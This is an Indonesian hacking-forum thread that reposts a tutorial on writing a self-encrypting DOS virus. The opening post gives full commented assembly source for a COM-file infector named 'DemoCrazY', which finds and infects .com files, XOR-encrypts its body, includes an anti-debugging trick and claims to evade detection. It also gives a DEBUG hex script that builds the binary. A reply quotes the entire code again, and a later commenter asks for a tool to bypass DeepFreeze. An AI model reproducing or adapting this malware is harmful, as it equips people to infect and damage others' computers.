Threaded Mode | Linear Mode

numlock · 09-27-2010, 07:53 PM

Ane temuin ternyata nih artikel masih ada...jadi ane post dimari..
waktu ane masih demen coding Asm...cekidot di pelajari

Code:

-= Virus Yang MengEnkripsi =-                        

                 -----------------------------

                              by

                        Syvatex/NumLocK

di artikel ini kita akan membahas bagaimana caranya virus dapat menginfeksi

file Com , mengenkripsi dirinya dan menaruhkan Pengenal di virus itu sendiri.

EHKRIPSI:

          enkripsi adalah suatu cara agar tubuh virus tidak dapat dilihat

          banyak metoda ennkripsi tapi gue akan menjelaskan yang gue pake

          dibawah ini. metoda hanya menggunakan pengacak byte yaitu XOR

          Xor {exslusive-OR} dan beberapa contoh pengacakan adalah

          Rol,Ror,Not,Neg.

          perhatikan contoh ilustrasi Xor dibawah ini.

      C = A Xor B { A di xor dengan B hasilnya adalah C maka untuk dapat }

      A = C Xor B { mengembalikan A hasil dari pada xor tadi di Xorkan dengan}

                  { C       }

         dibawah ini anda akan melihat bagaimana meletakan rutin enkripsi

         di sebuah virus.

                    call rutin_enkripsi

   enkripsi_mulai: -----------\

                   ac...d..d..  \ 

                   ..sdnyuk...    \

                   .efe..c.kll      \ badan virus yang dienkripsi

                   ...dfew..y.      / badan virus yang dienkripsi

                   ...c..dr...    /

                   ....and..v.  /

   enkripsi_selesai:----------/

   Rutin_enkripsi:

rutin enkripsi tidak boleh ikut terenkripsi karena apabila ikut terenkripsi

maka virus akan Hang sebab itu virus hanya mengenkripsi antara enkripsi_mulai

sampai enkripsi_selesai.

untuk lebih jelas lihat program virus di bawah ini.

langkahnya adalah : 1. hitung offset dan jalankan rutin encrypt

                    2. memgembalikan byte-byte yang di simpan

                       supaya file yang di infeksi berjalan normal

                    3. mengeset DTA area { DTA = Disk Transfer Area }

                    4. mencari nama file yang akan di infeksi

                    5. membuka nama file --------------------

                    6. membaca 5 byte awal dari file com untuk mengetahui

                       apakah sudah tertular

                    7. jalankan rutin enkripsi dan tulis virus di akhir file 

                    8. tutup file

                    9. jalankan file yang asli

*/ Contoh virus Yang Menyerang File Com \*

; Virus Name :  DemoCrazY

; Created by :  Syvatex/NumLocK

; Infect     :  File COM

; Encrypt    :  YES

; Type       :  Non - OW

; Detect     :  Can't detect

; Greetz to  :  NukE,SKISM,NoMercy,VLAD,VBB, and all virii writen

  .model tiny                            

  .code                                   

            org 100h                      

  startvirus:

            call start

            int 20h

  Start:  

            mov  ax,1603h           ;Cuma buat anti debugging trick

            int  17h                ;doang

  Offset_BP:

            mov bp,0000h            ;taruh BP = 0000h hanya untuk file ini

                                    ;untuk nilai BP yang baru lihat ******

            call encrypt            ;panggil/jalankan rutin encrypt

  enc_start:                        ;letak awal byte yang akan di enkripsi

            lea  si,[bp+old_bytes]  ;ambil 5 byte yang disimpan 

            mov  di,100h            ;letakan 5 byte di

            push di                 ;memori di=100h  ( XXXX:0100h )

            movsw                   ;pindahkan/salin

            movsw                   ;untuk melihat nya gunakan debug

            movsb

            mov  ah,1Ah                   ; Set DTA

            lea  dx,[bp+newDTA]           ; alamat baru dari DTA 

            int  21h

            lea  dx,[bp+exe_mask]         ; nama file yang akan dicari

            mov  ah,4eh                   ; cari file

            mov  cx,7                     ; attribute bebas

  findfirstnext:

            int  21h                     

            jc   done_infections          

            mov  ax,3d02h                 ; Buka file untuk dibaca dan di tulis

            lea  dx,[bp+newDTA+30]        ; letak nama file DTA+30

            int  21h

            xchg ax,bx                    ; return ax = file handle

                                          ; tukarkan ax = bx

            mov  ah,3fh                   ; baca file

            lea  dx,[bp+old_bytes]        ; letakan ke variable old_bytes

            mov  cx,5                     ; sebanyak 5 byte

            int  21h

  check: cmp byte ptr [bp+old_bytes+4],0c3h; apakah offset ke 4 sama dengan 0c3h

            jz  find_next                 ; kalo sama cari lagi ah...ah

            mov  ax,4202h            ; pindahkan penunjuk pointer

            xor  cx,cx               ; ke akhir file

            cwd                      ; cwd (1 byte ) = xor dx,dx (2 bytes)            

            int  21h

            add  ax,100h             ; tambahkan ax,100h

            mov  word ptr [bp+new_byte+1],ax  ; taruh nilai ax untuk penunjuk

                                 ; agar virus slalu di jalankan lebih dahulu

            ;*******Lihat Rutin untuk mencari nilai BP yang Baru*******

            sub  ax,105h                      ; kurangi ax dengan 105h

            mov  word ptr  [bp+offset_BP+1],ax ; taruh ax sebagai nilai offset baru

                                           ; di offset start+1

                                           ; BP = AX

            mov  word ptr  [bp+offset value],ax  ; Taruh nilai AX sebagai kunci

                                           ; Nilai AX akan berubah 2x

                                           ; tergantung besar file yang sudah dikurangi

            Call Tulis_virus               ; Pangil rutin Untuk menulis virus

            mov  ax,4200h                  ; pindahkan pointer

            cwd                            ; ke awal file

            xor cx,cx

            int 21h

            mov  ah,40h                    ; tulis pengenal dan penunjuk virus

            lea  dx,[bp+new_byte]          ; 

            mov  cl,5                      ; sebanyak 5 bytes

            int  21h

    find_next:                           

            mov ah,3eh                   ; tutup file handle

            int 21h

            mov  ah,4fh                   ; cari file lagi

            jmp  short findfirstnext

  done_infections:

            mov  di,100h                  ; set di kelamat 100h

                                          ; cs:0100h

            jmp  di                       ; loncat ke alamat 100h

                                          ; untuk menjalankan file yang asli

  exe_mask            db '*.com',0

  old_bytes           db 0cdh,20h,0,0,0c3h

  new_byte :          mov ax,0000h        

                      push ax

                      ret

  Pesan               db '(c) 2000 DemoCrazy by Syvatex/NumLocK '

  Enc_end:                                ; batas akhir dari Enkripsi

;-----Rutin Untuk Enkripsi ini tidak dienkripsi agar virus dapat jalan

;-----dengan semestinya-----------------------------------------

Encrypt:  

          Lea si,cs:[bp+offset enc_start]      ; Alamat virus akan di EnKripsi

          Mov ax,Word Ptr cs:[bp+Offset Value] ; Ambil nilai kunci untuk Xor

          Mov cx,(enc_end-Enc_start)/2   ; banyaknya byte yang akan di enkripsi

ulang:    Xor Word Ptr cs:[si],ax  

          inc si

          inc si

          loop ulang

          ret

Value dw 0000h

Tulis_virus: Call Encrypt

             mov  ah,40h                    ; tulis virus

             lea  dx,[bp+start]             ; mulai alamat start

             mov  cx,heap-start             ; sebanyak cx = heap - start

             int  21h                                      

             Call Encrypt

             ret

  heap:

  newDTA:  

  end       startvirus

;-------DEBUG SCRIPT CUT HERE-------------------------

;     caranya  DEBUG < NamaFile

;---------------------------------------------------

N DemoCrazy.COM

E 0100 E8 02 00 CD 20 B8 03 16 CD 17 BD 00 00 E8 AE 00

E 0110 8D B6 8E 01 BF 00 01 57 A5 A5 A4 B4 1A 8D 96 E6

E 0120 01 CD 21 8D 96 88 01 B4 4E B9 07 00 CD 21 72 53

E 0130 B8 02 3D 8D 96 04 02 CD 21 93 B4 3F 8D 96 8E 01

E 0140 B9 05 00 CD 21 80 BE 92 01 C3 74 2F B8 02 42 33

E 0150 C9 99 CD 21 05 00 01 89 86 94 01 2D 05 01 89 86

E 0160 0B 01 89 86 D2 01 E8 6B 00 B8 00 42 99 33 C9 CD

E 0170 21 B4 40 8D 96 93 01 B1 05 CD 21 B4 3E CD 21 B4

E 0180 4F EB A9 BF 00 01 FF E7 2A 2E 63 6F 6D 00 CD 20

E 0190 00 00 C3 B8 00 00 50 C3 28 63 29 20 32 30 30 30

E 01A0 20 44 65 6D 6F 43 72 61 7A 79 20 62 79 20 53 79

E 01B0 76 61 74 65 78 2F 4E 75 6D 4C 6F 63 4B 20 8D B6

E 01C0 10 01 2E 8B 86 D2 01 B9 57 00 2E 31 04 46 46 E2

E 01D0 F9 C3 00 00 E8 E7 FF B4 40 8D 96 05 01 B9 E1 00

E 01E0 CD 21 E8 D9 FF C3

RCX

E6

w

q

s7evens · 09-27-2010, 08:01 PM

(09-27-2010 07:53 PM)numlock Wrote: Ane temuin ternyata nih artikel masih ada...jadi ane post dimari..
waktu ane masih demen coding Asm...cekidot di pelajari

Code:

-= Virus Yang MengEnkripsi =- ----------------------------- by Syvatex/NumLocK di artikel ini kita akan membahas bagaimana caranya virus dapat menginfeksi file Com , mengenkripsi dirinya dan menaruhkan Pengenal di virus itu sendiri. EHKRIPSI: enkripsi adalah suatu cara agar tubuh virus tidak dapat dilihat banyak metoda ennkripsi tapi gue akan menjelaskan yang gue pake dibawah ini. metoda hanya menggunakan pengacak byte yaitu XOR Xor {exslusive-OR} dan beberapa contoh pengacakan adalah Rol,Ror,Not,Neg. perhatikan contoh ilustrasi Xor dibawah ini. C = A Xor B { A di xor dengan B hasilnya adalah C maka untuk dapat } A = C Xor B { mengembalikan A hasil dari pada xor tadi di Xorkan dengan} { C } dibawah ini anda akan melihat bagaimana meletakan rutin enkripsi di sebuah virus. call rutin_enkripsi enkripsi_mulai: -----------\ ac...d..d.. \ ..sdnyuk... \ .efe..c.kll \ badan virus yang dienkripsi ...dfew..y. / badan virus yang dienkripsi ...c..dr... / ....and..v. / enkripsi_selesai:----------/ Rutin_enkripsi: rutin enkripsi tidak boleh ikut terenkripsi karena apabila ikut terenkripsi maka virus akan Hang sebab itu virus hanya mengenkripsi antara enkripsi_mulai sampai enkripsi_selesai. untuk lebih jelas lihat program virus di bawah ini. langkahnya adalah : 1. hitung offset dan jalankan rutin encrypt 2. memgembalikan byte-byte yang di simpan supaya file yang di infeksi berjalan normal 3. mengeset DTA area { DTA = Disk Transfer Area } 4. mencari nama file yang akan di infeksi 5. membuka nama file -------------------- 6. membaca 5 byte awal dari file com untuk mengetahui apakah sudah tertular 7. jalankan rutin enkripsi dan tulis virus di akhir file 8. tutup file 9. jalankan file yang asli */ Contoh virus Yang Menyerang File Com \* ; Virus Name : DemoCrazY ; Created by : Syvatex/NumLocK ; Infect : File COM ; Encrypt : YES ; Type : Non - OW ; Detect : Can't detect ; Greetz to : NukE,SKISM,NoMercy,VLAD,VBB, and all virii writen .model tiny .code org 100h startvirus: call start int 20h Start: mov ax,1603h ;Cuma buat anti debugging trick int 17h ;doang Offset_BP: mov bp,0000h ;taruh BP = 0000h hanya untuk file ini ;untuk nilai BP yang baru lihat ****** call encrypt ;panggil/jalankan rutin encrypt enc_start: ;letak awal byte yang akan di enkripsi lea si,[bp+old_bytes] ;ambil 5 byte yang disimpan mov di,100h ;letakan 5 byte di push di ;memori di=100h ( XXXX:0100h ) movsw ;pindahkan/salin movsw ;untuk melihat nya gunakan debug movsb mov ah,1Ah ; Set DTA lea dx,[bp+newDTA] ; alamat baru dari DTA int 21h lea dx,[bp+exe_mask] ; nama file yang akan dicari mov ah,4eh ; cari file mov cx,7 ; attribute bebas findfirstnext: int 21h jc done_infections mov ax,3d02h ; Buka file untuk dibaca dan di tulis lea dx,[bp+newDTA+30] ; letak nama file DTA+30 int 21h xchg ax,bx ; return ax = file handle ; tukarkan ax = bx mov ah,3fh ; baca file lea dx,[bp+old_bytes] ; letakan ke variable old_bytes mov cx,5 ; sebanyak 5 byte int 21h check: cmp byte ptr [bp+old_bytes+4],0c3h; apakah offset ke 4 sama dengan 0c3h jz find_next ; kalo sama cari lagi ah...ah mov ax,4202h ; pindahkan penunjuk pointer xor cx,cx ; ke akhir file cwd ; cwd (1 byte ) = xor dx,dx (2 bytes) int 21h add ax,100h ; tambahkan ax,100h mov word ptr [bp+new_byte+1],ax ; taruh nilai ax untuk penunjuk ; agar virus slalu di jalankan lebih dahulu ;*******Lihat Rutin untuk mencari nilai BP yang Baru******* sub ax,105h ; kurangi ax dengan 105h mov word ptr [bp+offset_BP+1],ax ; taruh ax sebagai nilai offset baru ; di offset start+1 ; BP = AX mov word ptr [bp+offset value],ax ; Taruh nilai AX sebagai kunci ; Nilai AX akan berubah 2x ; tergantung besar file yang sudah dikurangi Call Tulis_virus ; Pangil rutin Untuk menulis virus mov ax,4200h ; pindahkan pointer cwd ; ke awal file xor cx,cx int 21h mov ah,40h ; tulis pengenal dan penunjuk virus lea dx,[bp+new_byte] ; mov cl,5 ; sebanyak 5 bytes int 21h find_next: mov ah,3eh ; tutup file handle int 21h mov ah,4fh ; cari file lagi jmp short findfirstnext done_infections: mov di,100h ; set di kelamat 100h ; cs:0100h jmp di ; loncat ke alamat 100h ; untuk menjalankan file yang asli exe_mask db '*.com',0 old_bytes db 0cdh,20h,0,0,0c3h new_byte : mov ax,0000h push ax ret Pesan db '(c) 2000 DemoCrazy by Syvatex/NumLocK ' Enc_end: ; batas akhir dari Enkripsi ;-----Rutin Untuk Enkripsi ini tidak dienkripsi agar virus dapat jalan ;-----dengan semestinya----------------------------------------- Encrypt: Lea si,cs:[bp+offset enc_start] ; Alamat virus akan di EnKripsi Mov ax,Word Ptr cs:[bp+Offset Value] ; Ambil nilai kunci untuk Xor Mov cx,(enc_end-Enc_start)/2 ; banyaknya byte yang akan di enkripsi ulang: Xor Word Ptr cs:[si],ax inc si inc si loop ulang ret Value dw 0000h Tulis_virus: Call Encrypt mov ah,40h ; tulis virus lea dx,[bp+start] ; mulai alamat start mov cx,heap-start ; sebanyak cx = heap - start int 21h Call Encrypt ret heap: newDTA: end startvirus ;-------DEBUG SCRIPT CUT HERE------------------------- ; caranya DEBUG < NamaFile ;--------------------------------------------------- N DemoCrazy.COM E 0100 E8 02 00 CD 20 B8 03 16 CD 17 BD 00 00 E8 AE 00 E 0110 8D B6 8E 01 BF 00 01 57 A5 A5 A4 B4 1A 8D 96 E6 E 0120 01 CD 21 8D 96 88 01 B4 4E B9 07 00 CD 21 72 53 E 0130 B8 02 3D 8D 96 04 02 CD 21 93 B4 3F 8D 96 8E 01 E 0140 B9 05 00 CD 21 80 BE 92 01 C3 74 2F B8 02 42 33 E 0150 C9 99 CD 21 05 00 01 89 86 94 01 2D 05 01 89 86 E 0160 0B 01 89 86 D2 01 E8 6B 00 B8 00 42 99 33 C9 CD E 0170 21 B4 40 8D 96 93 01 B1 05 CD 21 B4 3E CD 21 B4 E 0180 4F EB A9 BF 00 01 FF E7 2A 2E 63 6F 6D 00 CD 20 E 0190 00 00 C3 B8 00 00 50 C3 28 63 29 20 32 30 30 30 E 01A0 20 44 65 6D 6F 43 72 61 7A 79 20 62 79 20 53 79 E 01B0 76 61 74 65 78 2F 4E 75 6D 4C 6F 63 4B 20 8D B6 E 01C0 10 01 2E 8B 86 D2 01 B9 57 00 2E 31 04 46 46 E2 E 01D0 F9 C3 00 00 E8 E7 FF B4 40 8D 96 05 01 B9 E1 00 E 01E0 CD 21 E8 D9 FF C3 RCX E6 w q

COOL

Kemarin pernah coba2...malah puyeng mainan .asm hmm

**Qrembiezs** · 09-27-2010, 09:26 PM

wow wow wow akhir nya ..... NICE ....

darkslayer · 09-28-2010, 11:43 AM

pengen bisa kayak 3 orang di atas ane :'(

***mywisdom*** · 01-29-2011, 06:13 AM

makasih bet bro btw ada source ndak buat bypass deepfreeze belajar

putri sitasari · 01-30-2011, 04:30 PM

ma'acih ya... ku ceneng bngd cama assembly, qu save dlu iiyaahh

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	pemrograman di ms dos dengan assembly 16 bit+ analisa beberapa virus asm	mywisdom	8	1,796	01-21-2012 04:04 AM Last Post: oootrxooo
	Teknik 2 Virus Assembly 16 bit	mywisdom	1	1,446	08-06-2010 01:09 AM Last Post: spidernet